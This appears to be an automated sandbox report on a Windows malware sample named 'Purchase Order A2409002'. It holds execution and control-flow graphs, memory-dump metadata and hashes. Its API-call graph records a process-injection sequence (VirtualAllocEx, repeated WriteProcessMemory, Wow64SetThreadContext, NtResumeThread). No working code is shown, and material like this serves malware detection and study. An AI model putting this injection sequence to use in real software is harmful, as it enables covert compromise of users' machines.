                                        execution_graph 73366 2f82220 73367 2f8223a 73366->73367 73368 2f8224a 73367->73368 73372 2f867c8 73367->73372 73375 2f87f5a 73367->73375 73379 2f8849a 73367->73379 73383 2f8fdf0 73372->73383 73396 6d31189 73375->73396 73400 6d31198 73375->73400 73376 2f87f7e 73376->73368 73380 2f884bc 73379->73380 73382 2f8fdf0 2 API calls 73380->73382 73381 2f82e6c 73382->73381 73385 2f8fe17 73383->73385 73384 2f867e3 73388 6d30308 73385->73388 73392 6d30300 73385->73392 73389 6d30350 VirtualProtect 73388->73389 73391 6d3038b 73389->73391 73391->73384 73393 6d30350 VirtualProtect 73392->73393 73395 6d3038b 73393->73395 73395->73384 73397 6d311ad 73396->73397 73404 6d311d8 73397->73404 73401 6d311ad 73400->73401 73403 6d311d8 2 API calls 73401->73403 73402 6d311c5 73402->73376 73403->73402 73406 6d3120f 73404->73406 73405 6d311c5 73405->73376 73409 6d312e9 73406->73409 73413 6d312f0 73406->73413 73410 6d31330 VirtualAlloc 73409->73410 73412 6d3136a 73410->73412 73412->73405 73414 6d31330 VirtualAlloc 73413->73414 73416 6d3136a 73414->73416 73416->73405 73256 6fc8b45 73257 6fc8b4f 73256->73257 73262 703d750 73257->73262 73269 703d760 73257->73269 73274 703d75d 73257->73274 73258 6fc8b8d 73263 703d75d KiUserCallbackDispatcher 73262->73263 73264 703d757 73263->73264 73266 703d723 73264->73266 73279 703d792 73264->73279 73284 703d7a0 73264->73284 73265 703d78b 73265->73258 73266->73258 73270 703d775 73269->73270 73272 703d792 KiUserCallbackDispatcher 73270->73272 73273 703d7a0 KiUserCallbackDispatcher 73270->73273 73271 703d78b 73271->73258 73272->73271 73273->73271 73275 703d760 73274->73275 73277 703d792 KiUserCallbackDispatcher 73275->73277 73278 703d7a0 KiUserCallbackDispatcher 73275->73278 73276 703d78b 73276->73258 73277->73276 73278->73276 73281 703d797 73279->73281 73280 703d828 73280->73265 73281->73280 73289 703dac8 73281->73289 73293 703db10 73281->73293 73286 703d7c4 73284->73286 73285 703d828 73285->73265 73286->73285 73287 703db10 KiUserCallbackDispatcher 73286->73287 73288 703dac8 KiUserCallbackDispatcher 73286->73288 73287->73286 73288->73286 73290 703daed 73289->73290 73291 703db03 73290->73291 73298 7191e71 73290->73298 73291->73281 73294 703db1e 73293->73294 73296 703dace 73293->73296 73295 703dabb 73295->73281 73296->73295 73297 7191e71 KiUserCallbackDispatcher 73296->73297 73297->73295 73299 7191e77 73298->73299 73303 7199fd0 73299->73303 73307 7199fe0 73299->73307 73300 7191925 73304 7199fe0 73303->73304 73311 719b850 KiUserCallbackDispatcher 73304->73311 73308 7199ff7 73307->73308 73310 719b850 KiUserCallbackDispatcher 73308->73310 73309 719a00d 73309->73300 73310->73309 73312 719a00d 73311->73312 73312->73300 73313 6fc8cc6 73314 6fc8cd0 73313->73314 73318 719c8c0 73314->73318 73323 719c8d0 73314->73323 73315 6fc8627 73319 719c8c3 73318->73319 73328 719c910 73319->73328 73332 719c902 73319->73332 73320 719c8fb 73320->73315 73324 719c8e5 73323->73324 73326 719c910 SleepEx 73324->73326 73327 719c902 SleepEx 73324->73327 73325 719c8fb 73325->73315 73326->73325 73327->73325 73330 719c911 73328->73330 73329 719c97e 73329->73320 73330->73329 73336 719d248 73330->73336 73333 719c907 73332->73333 73334 719c97e 73333->73334 73335 719d248 SleepEx 73333->73335 73334->73320 73335->73333 73337 719d288 SleepEx 73336->73337 73339 719d2c6 73337->73339 73339->73330 73340 6fc8db6 73341 6fc8dc0 73340->73341 73345 719ff18 73341->73345 73349 719ff09 73341->73349 73342 6fc8627 73346 719ff2d 73345->73346 73347 719ff43 73346->73347 73353 6182b04 73346->73353 73347->73342 73350 719ff18 73349->73350 73351 719ff43 73350->73351 73352 6182b04 2 API calls 73350->73352 73351->73342 73352->73351 73354 6182b1d 73353->73354 73358 61855e4 73354->73358 73362 61855f0 73354->73362 73359 61855f0 CopyFileA 73358->73359 73361 6185747 73359->73361 73363 6185645 CopyFileA 73362->73363 73365 6185747 73363->73365 72923 6fc91e0 72924 6fc9178 72923->72924 72924->72923 72925 6fc9236 72924->72925 72928 6186592 72924->72928 72933 61865a0 72924->72933 72929 61865a0 72928->72929 72930 61865cb 72929->72930 72938 618664e 72929->72938 72943 6186957 72929->72943 72930->72924 72934 61865b5 72933->72934 72935 618664e 4 API calls 72934->72935 72936 61865cb 72934->72936 72937 6186957 4 API calls 72934->72937 72935->72936 72936->72924 72937->72936 72940 6186663 72938->72940 72939 618663d 72939->72930 72940->72939 72948 6187ff8 72940->72948 72953 6187fe8 72940->72953 72944 618663d 72943->72944 72945 618695f 72943->72945 72944->72930 72945->72944 72946 6187ff8 4 API calls 72945->72946 72947 6187fe8 4 API calls 72945->72947 72946->72944 72947->72944 72949 618800d 72948->72949 72959 6188578 72949->72959 72964 61882ff 72949->72964 72955 6187fee 72953->72955 72954 6187fda 72954->72939 72955->72954 72957 6188578 4 API calls 72955->72957 72958 61882ff 4 API calls 72955->72958 72956 618802f 72956->72939 72957->72956 72958->72956 72960 618830a 72959->72960 72961 61880ad 72959->72961 72969 6188869 72960->72969 73013 6188878 72960->73013 72965 6188302 72964->72965 72967 6188878 4 API calls 72965->72967 72968 6188869 4 API calls 72965->72968 72966 61880ad 72967->72966 72968->72966 72970 6188878 72969->72970 72983 61888af 72970->72983 73057 61897d9 72970->73057 73061 61899a7 72970->73061 73068 6188be5 72970->73068 73072 61892a6 72970->73072 73076 61892e4 72970->73076 73080 6189024 72970->73080 73084 6189162 72970->73084 73088 6189ae3 72970->73088 73092 618996f 72970->73092 73096 6189f20 72970->73096 73101 61896eb 72970->73101 73105 618946d 72970->73105 73109 6188ba9 72970->73109 73113 6189b29 72970->73113 73117 61893b6 72970->73117 73121 61890b7 72970->73121 73125 61897b6 72970->73125 73129 61897f6 72970->73129 73133 61889f5 72970->73133 73139 6188976 72970->73139 73143 6188d72 72970->73143 73149 6188eb5 72970->73149 73153 61898bc 72970->73153 73160 6189a71 72970->73160 73167 61888bb 72970->73167 73171 618937c 72970->73171 73175 6189945 72970->73175 73179 6188fba 72970->73179 73183 6189c40 72970->73183 73187 6188c83 72970->73187 73191 61888c8 72970->73191 73195 6188956 72970->73195 73199 6188c88 72970->73199 73205 61897d4 72970->73205 73209 6188f15 72970->73209 73213 6189750 72970->73213 73217 61889d4 72970->73217 73221 618935f 72970->73221 73228 61892df 72970->73228 73232 618905a 72970->73232 73236 6188a5c 72970->73236 72983->72961 73014 618888d 73013->73014 73015 61888af 73014->73015 73016 61897d9 NtResumeThread 73014->73016 73017 618905a WriteProcessMemory 73014->73017 73018 6188a5c WriteProcessMemory 73014->73018 73019 618935f 2 API calls 73014->73019 73020 61892df NtResumeThread 73014->73020 73021 6189750 Wow64SetThreadContext 73014->73021 73022 61889d4 WriteProcessMemory 73014->73022 73023 61897d4 WriteProcessMemory 73014->73023 73024 6188f15 WriteProcessMemory 73014->73024 73025 6188956 WriteProcessMemory 73014->73025 73026 6188c88 2 API calls 73014->73026 73027 61888c8 WriteProcessMemory 73014->73027 73028 6189c40 WriteProcessMemory 73014->73028 73029 6188c83 WriteProcessMemory 73014->73029 73030 6189945 WriteProcessMemory 73014->73030 73031 6188fba WriteProcessMemory 73014->73031 73032 61888bb WriteProcessMemory 73014->73032 73033 618937c WriteProcessMemory 73014->73033 73034 61898bc 2 API calls 73014->73034 73035 6189a71 WriteProcessMemory 73014->73035 73036 6188d72 WriteProcessMemory 73014->73036 73037 6188eb5 WriteProcessMemory 73014->73037 73038 61889f5 2 API calls 73014->73038 73039 6188976 WriteProcessMemory 73014->73039 73040 61897b6 WriteProcessMemory 73014->73040 73041 61897f6 WriteProcessMemory 73014->73041 73042 61893b6 WriteProcessMemory 73014->73042 73043 61890b7 WriteProcessMemory 73014->73043 73044 6188ba9 WriteProcessMemory 73014->73044 73045 6189b29 WriteProcessMemory 73014->73045 73046 61896eb WriteProcessMemory 73014->73046 73047 618946d NtResumeThread 73014->73047 73048 618996f WriteProcessMemory 73014->73048 73049 6189f20 WriteProcessMemory 73014->73049 73050 6189162 WriteProcessMemory 73014->73050 73051 6189ae3 WriteProcessMemory 73014->73051 73052 61892e4 WriteProcessMemory 73014->73052 73053 6189024 WriteProcessMemory 73014->73053 73054 6188be5 VirtualAllocEx 73014->73054 73055 61892a6 WriteProcessMemory 73014->73055 73056 61899a7 WriteProcessMemory 73014->73056 73015->72961 73016->73015 73017->73015 73018->73015 73019->73015 73020->73015 73021->73015 73022->73015 73023->73015 73024->73015 73025->73015 73026->73015 73027->73015 73028->73015 73029->73015 73030->73015 73031->73015 73032->73015 73033->73015 73034->73015 73035->73015 73036->73015 73037->73015 73038->73015 73039->73015 73040->73015 73041->73015 73042->73015 73043->73015 73044->73015 73045->73015 73046->73015 73047->73015 73048->73015 73049->73015 73050->73015 73051->73015 73052->73015 73053->73015 73054->73015 73055->73015 73056->73015 73058 61897e6 73057->73058 73059 618946d 73057->73059 73059->73057 73240 71f2fc0 73059->73240 73062 61899b6 73061->73062 73063 6189a7c 73062->73063 73064 61889dd 73062->73064 73066 71f2998 WriteProcessMemory 73062->73066 73065 6189ce1 73064->73065 73244 71f2998 73064->73244 73065->72983 73066->73062 73069 6188beb 73068->73069 73248 71f2728 73069->73248 73073 61889dd 73072->73073 73074 6189ce1 73073->73074 73075 71f2998 WriteProcessMemory 73073->73075 73074->72983 73075->73073 73077 61889dd 73076->73077 73078 6189ce1 73077->73078 73079 71f2998 WriteProcessMemory 73077->73079 73078->72983 73079->73077 73081 61889dd 73080->73081 73082 6189ce1 73081->73082 73083 71f2998 WriteProcessMemory 73081->73083 73082->72983 73083->73081 73085 61889dd 73084->73085 73086 6189ce1 73085->73086 73087 71f2998 WriteProcessMemory 73085->73087 73086->72983 73087->73085 73089 61889dd 73088->73089 73090 6189ce1 73089->73090 73091 71f2998 WriteProcessMemory 73089->73091 73090->72983 73091->73089 73093 61889dd 73092->73093 73094 6189ce1 73093->73094 73095 71f2998 WriteProcessMemory 73093->73095 73094->72983 73095->73093 73097 6188940 73096->73097 73098 618894b 73097->73098 73099 6189ce1 73097->73099 73100 71f2998 WriteProcessMemory 73097->73100 73098->73098 73099->72983 73100->73097 73102 61889dd 73101->73102 73103 6189ce1 73102->73103 73104 71f2998 WriteProcessMemory 73102->73104 73103->72983 73104->73102 73106 6189477 73105->73106 73106->73105 73107 61897e6 73106->73107 73108 71f2fc0 NtResumeThread 73106->73108 73108->73106 73110 61889dd 73109->73110 73111 6189ce1 73110->73111 73112 71f2998 WriteProcessMemory 73110->73112 73111->72983 73112->73110 73114 61889dd 73113->73114 73115 6189ce1 73114->73115 73116 71f2998 WriteProcessMemory 73114->73116 73115->72983 73116->73114 73118 61889dd 73117->73118 73119 6189ce1 73118->73119 73120 71f2998 WriteProcessMemory 73118->73120 73119->72983 73120->73118 73122 61889dd 73121->73122 73123 6189ce1 73122->73123 73124 71f2998 WriteProcessMemory 73122->73124 73123->72983 73124->73122 73126 61889dd 73125->73126 73127 6189ce1 73126->73127 73128 71f2998 WriteProcessMemory 73126->73128 73127->72983 73128->73126 73130 61889dd 73129->73130 73131 6189ce1 73130->73131 73132 71f2998 WriteProcessMemory 73130->73132 73131->72983 73132->73130 73134 6188a04 73133->73134 73252 71f2188 73134->73252 73135 61889dd 73136 6189ce1 73135->73136 73138 71f2998 WriteProcessMemory 73135->73138 73136->72983 73138->73135 73140 6188940 73139->73140 73141 618894b 73140->73141 73142 71f2998 WriteProcessMemory 73140->73142 73141->72983 73142->73140 73144 6188d81 73143->73144 73147 71f2998 WriteProcessMemory 73144->73147 73145 61889dd 73146 6189ce1 73145->73146 73148 71f2998 WriteProcessMemory 73145->73148 73146->72983 73147->73145 73148->73145 73150 61889dd 73149->73150 73150->73149 73151 6189ce1 73150->73151 73152 71f2998 WriteProcessMemory 73150->73152 73151->72983 73152->73150 73154 6188cae 73153->73154 73155 61898c6 73153->73155 73159 71f2728 VirtualAllocEx 73154->73159 73156 61889dd 73157 6189ce1 73156->73157 73158 71f2998 WriteProcessMemory 73156->73158 73157->72983 73158->73156 73159->73156 73161 6189a7c 73160->73161 73162 6189a15 73160->73162 73162->73160 73163 61889dd 73162->73163 73165 71f2998 WriteProcessMemory 73162->73165 73164 6189ce1 73163->73164 73166 71f2998 WriteProcessMemory 73163->73166 73164->72983 73165->73162 73166->73163 73168 61888bd 73167->73168 73169 618894b 73168->73169 73170 71f2998 WriteProcessMemory 73168->73170 73169->72983 73170->73168 73172 61889dd 73171->73172 73173 6189ce1 73172->73173 73174 71f2998 WriteProcessMemory 73172->73174 73173->72983 73174->73172 73176 61889dd 73175->73176 73177 6189ce1 73176->73177 73178 71f2998 WriteProcessMemory 73176->73178 73177->72983 73178->73176 73180 61889dd 73179->73180 73181 6189ce1 73180->73181 73182 71f2998 WriteProcessMemory 73180->73182 73181->72983 73182->73180 73184 61889dd 73183->73184 73185 6189ce1 73184->73185 73186 71f2998 WriteProcessMemory 73184->73186 73185->72983 73186->73184 73188 61889dd 73187->73188 73189 6189ce1 73188->73189 73190 71f2998 WriteProcessMemory 73188->73190 73189->72983 73190->73188 73192 61888fb 73191->73192 73193 618894b 73192->73193 73194 71f2998 WriteProcessMemory 73192->73194 73193->72983 73194->73192 73196 6188940 73195->73196 73197 618894b 73196->73197 73198 71f2998 WriteProcessMemory 73196->73198 73197->72983 73198->73196 73200 6188c92 73199->73200 73204 71f2728 VirtualAllocEx 73200->73204 73201 61889dd 73202 6189ce1 73201->73202 73203 71f2998 WriteProcessMemory 73201->73203 73202->72983 73203->73201 73204->73201 73206 61889dd 73205->73206 73207 6189ce1 73206->73207 73208 71f2998 WriteProcessMemory 73206->73208 73207->72983 73208->73206 73210 61889dd 73209->73210 73211 6189ce1 73210->73211 73212 71f2998 WriteProcessMemory 73210->73212 73211->72983 73212->73210 73214 6189756 73213->73214 73216 71f2188 Wow64SetThreadContext 73214->73216 73215 618978d 73216->73215 73218 61889dd 73217->73218 73219 6189ce1 73218->73219 73220 71f2998 WriteProcessMemory 73218->73220 73219->72983 73220->73218 73222 618936f 73221->73222 73223 6188cae 73221->73223 73227 71f2728 VirtualAllocEx 73223->73227 73224 61889dd 73225 6189ce1 73224->73225 73226 71f2998 WriteProcessMemory 73224->73226 73225->72983 73226->73224 73227->73224 73229 618946d 73228->73229 73230 61897e6 73229->73230 73231 71f2fc0 NtResumeThread 73229->73231 73231->73229 73233 61889dd 73232->73233 73234 6189ce1 73233->73234 73235 71f2998 WriteProcessMemory 73233->73235 73234->72983 73235->73233 73237 61889dd 73236->73237 73238 6189ce1 73237->73238 73239 71f2998 WriteProcessMemory 73237->73239 73238->72983 73239->73237 73241 71f3008 NtResumeThread 73240->73241 73243 71f303d 73241->73243 73243->73059 73245 71f29e0 WriteProcessMemory 73244->73245 73247 71f2a37 73245->73247 73247->73064 73249 71f2768 VirtualAllocEx 73248->73249 73251 6188c63 73249->73251 73253 71f21cd Wow64SetThreadContext 73252->73253 73255 71f2215 73253->73255 73255->73135

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 49 6d370a9-6d370e6 50 6d370e8 49->50 51 6d370ed-6d3720f 49->51 50->51 55 6d37233-6d3723f 51->55 56 6d37211-6d37227 51->56 57 6d37241 55->57 58 6d37246-6d3724b 55->58 333 6d3722d call 6d39c48 56->333 334 6d3722d call 6d39c38 56->334 57->58 59 6d37283-6d372cc 58->59 60 6d3724d-6d37259 58->60 70 6d372d3-6d37316 59->70 71 6d372ce 59->71 62 6d37260-6d3727e 60->62 63 6d3725b 60->63 64 6d389e7-6d389ed 62->64 63->62 66 6d38a18 64->66 67 6d389ef-6d38a0f 64->67 67->66 75 6d37322-6d37598 70->75 71->70 96 6d37fc8-6d37fd4 75->96 97 6d37fda-6d38012 96->97 98 6d3759d-6d375a9 96->98 107 6d380ec-6d380f2 97->107 99 6d375b0-6d376d5 98->99 100 6d375ab 98->100 134 6d376d7-6d3770f 99->134 135 6d37715-6d3779e 99->135 100->99 108 6d38017-6d38094 107->108 109 6d380f8-6d38130 107->109 124 6d380c7-6d380e9 108->124 125 6d38096-6d3809a 108->125 119 6d3848e-6d38494 109->119 121 6d38135-6d38337 119->121 122 6d3849a-6d384e2 119->122 216 6d383d6-6d383da 121->216 217 6d3833d-6d383d1 121->217 132 6d384e4-6d38557 122->132 133 6d3855d-6d385a8 122->133 124->107 125->124 129 6d3809c-6d380c4 125->129 129->124 132->133 154 6d389b1-6d389b7 133->154 134->135 161 6d377a0-6d377a8 135->161 162 6d377ad-6d37831 135->162 157 6d385ad-6d3862f 154->157 158 6d389bd-6d389e5 154->158 176 6d38631-6d3864c 157->176 177 6d38657-6d38663 157->177 158->64 165 6d37fb9-6d37fc5 161->165 197 6d37833-6d3783b 162->197 198 6d37840-6d378c4 162->198 165->96 176->177 178 6d38665 177->178 179 6d3866a-6d38676 177->179 178->179 183 6d38689-6d38698 179->183 184 6d38678-6d38684 179->184 185 6d386a1-6d38979 183->185 186 6d3869a 183->186 188 6d38998-6d389ae 184->188 219 6d38984-6d38990 185->219 186->185 189 6d38792-6d387fb 186->189 190 6d38800-6d38869 186->190 191 6d386a7-6d38710 186->191 192 6d38715-6d3878d 186->192 193 6d3886e-6d388d6 186->193 188->154 189->219 190->219 191->219 192->219 227 6d3894a-6d38950 193->227 197->165 241 6d378d3-6d37957 198->241 242 6d378c6-6d378ce 198->242 222 6d38437-6d38474 216->222 223 6d383dc-6d38435 216->223 239 6d38475-6d3848b 217->239 219->188 222->239 223->239 232 6d38952-6d3895c 227->232 233 6d388d8-6d38936 227->233 232->219 246 6d38938 233->246 247 6d3893d-6d38947 233->247 239->119 254 6d37966-6d379ea 241->254 255 6d37959-6d37961 241->255 242->165 246->247 247->227 261 6d379f9-6d37a7d 254->261 262 6d379ec-6d379f4 254->262 255->165 268 6d37a7f-6d37a87 261->268 269 6d37a8c-6d37b10 261->269 262->165 268->165 275 6d37b12-6d37b1a 269->275 276 6d37b1f-6d37ba3 269->276 275->165 282 6d37bb2-6d37c36 276->282 283 6d37ba5-6d37bad 276->283 289 6d37c45-6d37cc9 282->289 290 6d37c38-6d37c40 282->290 283->165 296 6d37ccb-6d37cd3 289->296 297 6d37cd8-6d37d5c 289->297 290->165 296->165 303 6d37d6b-6d37def 297->303 304 6d37d5e-6d37d66 297->304 310 6d37df1-6d37df9 303->310 311 6d37dfe-6d37e82 303->311 304->165 310->165 317 6d37e91-6d37f15 311->317 318 6d37e84-6d37e8c 311->318 324 6d37f17-6d37f1f 317->324 325 6d37f24-6d37fa8 317->325 318->165 324->165 331 6d37fb4-6d37fb6 325->331 332 6d37faa-6d37fb2 325->332 331->165 332->165 333->55 334->55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2
                                        • API String ID: 0-450215437
                                        • Opcode ID: ac33f4cbf66f17de0200c93969baf9c66a206036e2a42d30333abc835bca8f74
                                        • Instruction ID: 9c7724c78624cc8d5566dff38e1a41c349d6532107873ef40cd84672ef329d6d
                                        • Opcode Fuzzy Hash: ac33f4cbf66f17de0200c93969baf9c66a206036e2a42d30333abc835bca8f74
                                        • Instruction Fuzzy Hash: 22E2C374A40628CFDB65DF69D894B9ABBB2FF89301F1091E9D509A7344DB309E81CF81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 1a1d7529fa0e8531795b720f4151d1d441e6e972ddb48c9528ecb7cc641f7e88
                                        • Instruction ID: f95fb0ddb143a8c33ac8d108d8f0b38c10f0d078bdb0cb61fceeb7f552f38e19
                                        • Opcode Fuzzy Hash: 1a1d7529fa0e8531795b720f4151d1d441e6e972ddb48c9528ecb7cc641f7e88
                                        • Instruction Fuzzy Hash: 3DB20534E00219CFDB54CFA9C994BADB7B6BF88310F1485A9E505AB3A5DB70AC85CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 758 618c0a0-618c0c1 759 618c0c8-618c19b call 618cfc8 758->759 760 618c0c3 758->760 767 618c1aa 759->767 768 618c19d-618c1a8 759->768 760->759 769 618c1b4-618c2cf 767->769 768->769 780 618c2e1-618c30c 769->780 781 618c2d1-618c2d7 769->781 782 618cac0-618cadc 780->782 781->780 783 618c311-618c474 call 618b168 782->783 784 618cae2-618cafd 782->784 795 618c486-618c5a5 call 725f6e0 783->795 796 618c476-618c47c 783->796 804 618c5aa-618c603 795->804 796->795 806 618c668-618c672 804->806 807 618c605-618c609 804->807 810 618c899-618c8b8 806->810 808 618c60b-618c60c 807->808 809 618c611-618c663 807->809 811 618c93e-618c9a9 808->811 809->811 812 618c8be-618c8e8 810->812 813 618c677-618c7bd call 618b168 810->813 830 618c9bb-618ca06 811->830 831 618c9ab-618c9b1 811->831 819 618c8ea-618c938 812->819 820 618c93b-618c93c 812->820 842 618c892-618c893 813->842 843 618c7c3-618c88f call 618b168 813->843 819->820 820->811 833 618ca0c-618caa4 830->833 834 618caa5-618cabd 830->834 831->830 833->834 834->782 842->810 843->842
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8
                                        • API String ID: 0-4194326291
                                        • Opcode ID: aaa5303e505b3a12622843a3af2ff2660ff037acb79677db8495aacb92b066a8
                                        • Instruction ID: 453c7f4c6742f7b0eb344cf418f25f5adc4b4a94c695f46d9c2de1ddacb69c20
                                        • Opcode Fuzzy Hash: aaa5303e505b3a12622843a3af2ff2660ff037acb79677db8495aacb92b066a8
                                        • Instruction Fuzzy Hash: CA52B575D006298FDB65DF69C890AD9B7B2FF89300F1486E9D909A7350DB30AE81CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 8a8f021e27b1ad79d09e3308474e8c1ecd9d7d959b24fbfa01c294f2d944c5b4
                                        • Instruction ID: 91f3ef1b2b9b7de8cbfcdd93941339dc1349b0efdbee2346609e4f854e7d51ec
                                        • Opcode Fuzzy Hash: 8a8f021e27b1ad79d09e3308474e8c1ecd9d7d959b24fbfa01c294f2d944c5b4
                                        • Instruction Fuzzy Hash: 2422E934E00215CFDB64CF69C994BA9B7B6FF88310F1481A9E509AB3A5DB70AD85CF50
                                        APIs
                                        • NtResumeThread.NTDLL(?,?), ref: 071F302E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346955002.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: true
                                        • Associated: 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_71a0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 6269b6ce86e243203a5be14f48cc326f36f4819dfaba92e316c92cc8dd793a89
                                        • Instruction ID: ab33ce6a881cb18fc3a54a04334ceae90a736dbee7a5683954848e6a3171d49d
                                        • Opcode Fuzzy Hash: 6269b6ce86e243203a5be14f48cc326f36f4819dfaba92e316c92cc8dd793a89
                                        • Instruction Fuzzy Hash: AE1103B1D003499FDB10DFAAC485B9EFBF4EF88620F10842AD519A7240CB79A904CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: ed10713d8dad858e56b1689a79209cf6d3e682f26cfc0beedc04bc2bf165f8cc
                                        • Instruction ID: fe15f161568ae7bdc3da1a75951d889d6aa3fa77185c71ab934b9cdb056163e5
                                        • Opcode Fuzzy Hash: ed10713d8dad858e56b1689a79209cf6d3e682f26cfc0beedc04bc2bf165f8cc
                                        • Instruction Fuzzy Hash: 6DC19F70D59209DEEF94CFA9C448BEEBBF5AF49304F00A029D425A7281C7785986CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: dd0da6e03176ee5a30dda0f6b0dbcedd1f1f45bbfeb871d25e00f1d7baf42f43
                                        • Instruction ID: 5658ed5c19c9dcd95d3989c1e5857e5ea34634f63a0d54354c9083033ad7e856
                                        • Opcode Fuzzy Hash: dd0da6e03176ee5a30dda0f6b0dbcedd1f1f45bbfeb871d25e00f1d7baf42f43
                                        • Instruction Fuzzy Hash: 24C1B170D49309DEEF94CFA5C448BEEBBF5AF49304F00A069D425A7281C778598ACFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vgm
                                        • API String ID: 0-3507608961
                                        • Opcode ID: 444108ad8f4a9a202599ea00b94221052e41c94384b37ec959c02b12c45c6c39
                                        • Instruction ID: f9ebd247de89b60d66cf3fd54d9343297cd860ad75ce66bde06d6e72274f722e
                                        • Opcode Fuzzy Hash: 444108ad8f4a9a202599ea00b94221052e41c94384b37ec959c02b12c45c6c39
                                        • Instruction Fuzzy Hash: BFB16DB0E1060ACFDF15CFA9C8957DEBBF2AF89704F148139D815A7294EB349946CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: h
                                        • API String ID: 0-2439710439
                                        • Opcode ID: 2692944a19d9ade9c402d51225053c43012f2962d36b7a8e4eb5ba29f8ca1b0a
                                        • Instruction ID: 67a09d573f338c64c70a19164d50f5a9fb52771b41bfe85f8658ec3e1d173cf9
                                        • Opcode Fuzzy Hash: 2692944a19d9ade9c402d51225053c43012f2962d36b7a8e4eb5ba29f8ca1b0a
                                        • Instruction Fuzzy Hash: 9971E475D016298FEB64DF69D890ADAB7B2FF89300F10C2AAD50DA7250DB305E85CF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -
                                        • API String ID: 0-2547889144
                                        • Opcode ID: 54af7979c6a22de8e6bf0dbb38df096ef989d4d7eb7a9e122140f12fdb9a92f7
                                        • Instruction ID: 196dc48262841037c86800003a54bdaf3e4a4a033499eae1b3d23e5ad808550a
                                        • Opcode Fuzzy Hash: 54af7979c6a22de8e6bf0dbb38df096ef989d4d7eb7a9e122140f12fdb9a92f7
                                        • Instruction Fuzzy Hash: 6F615874A11218CFDBA4CB69DC847AAB3B2EF89300F5495A5E40AEB354CB789D81CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: g
                                        • API String ID: 0-30677878
                                        • Opcode ID: 721e9fab682925446b3d6e0373decb22fd3a1835709ae8919dda00a02ea3b623
                                        • Instruction ID: 807686d8cc6c09ebbd42af316cf14ef7deb09feb8cfdd7863da0951155fccaed
                                        • Opcode Fuzzy Hash: 721e9fab682925446b3d6e0373decb22fd3a1835709ae8919dda00a02ea3b623
                                        • Instruction Fuzzy Hash: 1E410EB1D056589FEB5DCF6BC80069AFAFBAFC9300F14D0FA994CA6255EB700A418F41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
